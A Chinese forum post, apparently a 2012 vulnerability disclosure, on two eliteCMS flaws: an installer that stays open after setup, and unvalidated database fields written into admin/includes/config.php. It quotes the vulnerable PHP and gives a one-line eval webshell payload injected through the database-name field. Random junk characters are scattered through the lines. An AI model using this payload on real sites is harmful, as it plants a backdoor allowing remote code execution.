找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2293|回复: 0
打印 上一主题 下一主题

eliteCMS安装文件未验证 + 一句话写入安全漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-18 13:59:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装
9 d9 E0 P3 }0 h! q9 o' Q5 s1 k) ~) W: T* @  G: i8 J% s
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
' [( H8 j, o$ J( x$ i$ S" I2 B% {我们来看代码:7 r  G) M: a5 e/ v
1 D" y3 o0 S1 P) S
...
# Z# K' z: J: j% }. i! E7 s, {- B9 ]elseif ($_GET['step'] == "4") {
3 s" Z4 Z2 ]% V6 _    $file = "../admin/includes/config.php";
/ g4 [8 a! H- Y  E5 {9 N) Y    $write = "<?php\n";; P/ T7 V5 k" n* N: o
    $write .= "/**\n";) O; T% z" ^1 c- N$ U3 U, p
    $write .= "*\n";$ i" ]6 ~! X5 u# ?, X
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";) m& ~/ d9 t8 [: Q4 H( ?* m
...略...) L. t: Y5 q3 T, p, h; j1 w
    $write .= "*\n";
9 _" Z9 R) t7 W! d. `( \5 ^# e- S    $write .= "*/\n";
. _, P9 Y( F# j: H' i/ W    $write .= "\n";
5 H; o, I  u) k; P  @    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";* S" I3 b" C8 K- S# t
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
& D0 X$ ~& P2 n, p6 ]$ Q  T9 Z" ]* k    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
( K$ s3 c% c% [1 V0 c# n    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
8 F3 l1 C; X/ t' a  X, M    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";# _; j! a1 r2 S- Z5 }
    $write .= "if (!\$connection) {\n";
' m3 \5 j' c& v  I    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
( f8 I8 _0 c7 s1 y5 W2 {    $write .= "        \n";
" A7 y" r! P7 |% o    $write .= "} \n";
) P/ T1 O0 X6 A6 o    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
+ X3 Z$ E* L# j8 h6 ^4 b    $write .= "if (!\$db_select) {\n";  z( V" ^  O3 v1 J6 v4 X- Z
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
0 H3 m: R! A3 _% |1 N    $write .= "        \n";
1 I0 Y/ l: W5 X    $write .= "} \n";
7 `' T- y6 i" [9 J  Q7 r/ x    $write .= "?>\n";
) x/ f( z3 D+ W$ Q. s 9 r/ B; l+ [# a* {+ Q8 }4 U
    $writer = fopen($file, 'w');3 D* v9 R$ i  h% s  v/ H, `
...
/ d+ e6 X2 L0 F) N
6 \; w5 a" ?4 _" y" ]/ q; j在看代码:( C( B, u4 `5 n: K) O4 r7 R- y

; r$ B  R4 F% f/ |2 i. s+ e$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];& A  U$ C: u. K+ k
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];3 f3 A) g7 I' N4 j0 x
$_SESSION['DB_USER'] = $_POST['DB_USER'];1 e; o8 q6 W4 q3 }
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
( o+ k8 n5 v% ?9 v
3 o: D# p  v, E9 {! F2 S! a5 V5 o# t取值未作任何验证6 S: O/ Z# y8 j% W
如果将数据库名POST数据:
+ E4 J  T  E) r5 J( m. F 7 |' @: b8 e6 o
"?><?php eval($_POST[c]);?><?php
3 c1 X7 ?8 w$ a: ?. j. V 1 W+ x+ p, O# G: z) Y
将导致一句话后门写入/admin/includes/config.php
9 x3 d% U, [# m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表